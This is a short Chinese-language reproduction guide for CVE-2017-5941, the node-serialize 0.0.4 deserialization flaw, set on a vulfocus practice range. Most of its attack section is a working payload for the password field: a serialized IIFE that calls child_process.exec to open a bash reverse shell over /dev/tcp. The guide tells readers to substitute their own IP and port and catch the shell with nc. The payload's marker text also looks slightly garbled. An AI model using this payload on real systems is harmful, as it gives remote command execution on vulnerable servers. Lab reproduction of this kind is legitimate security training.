Node.js_node-serialize反序列化代码执行CVE-2017-5941

影响范围

使用node-serialize 0.0.4 进行反序列化的node.js应用程序

漏洞描述

在 Node.js 的节点序列化包node-serialize 0.0.4 中发现了一个问题。通过传递带有立即调用函数表达式 (IIFE) 的 JavaScript 对象，可以利用传递到 unserialize() 函数的不受信任数据来实现任意代码执行。

复现操作步骤

使用vulfocus启动靶场环境。

用户随便输入，在密码处填写payload

payload：_$$N{D}_{F}UNC$$_function (){require(‘child_process’).exec(‘bash -c “bash -i >& /dev/tcp/127.0.0.1/7410 0>&1”’)}()

IP和端口改成自己的

在自己服务器上用NC监听payload的端口，提交后反弹成功后便可以执行命令

参考链接

https://vulfocus.cn/#/dashboard?image_id=8a0d0867-a576-4833-8f8a-91a48a372f90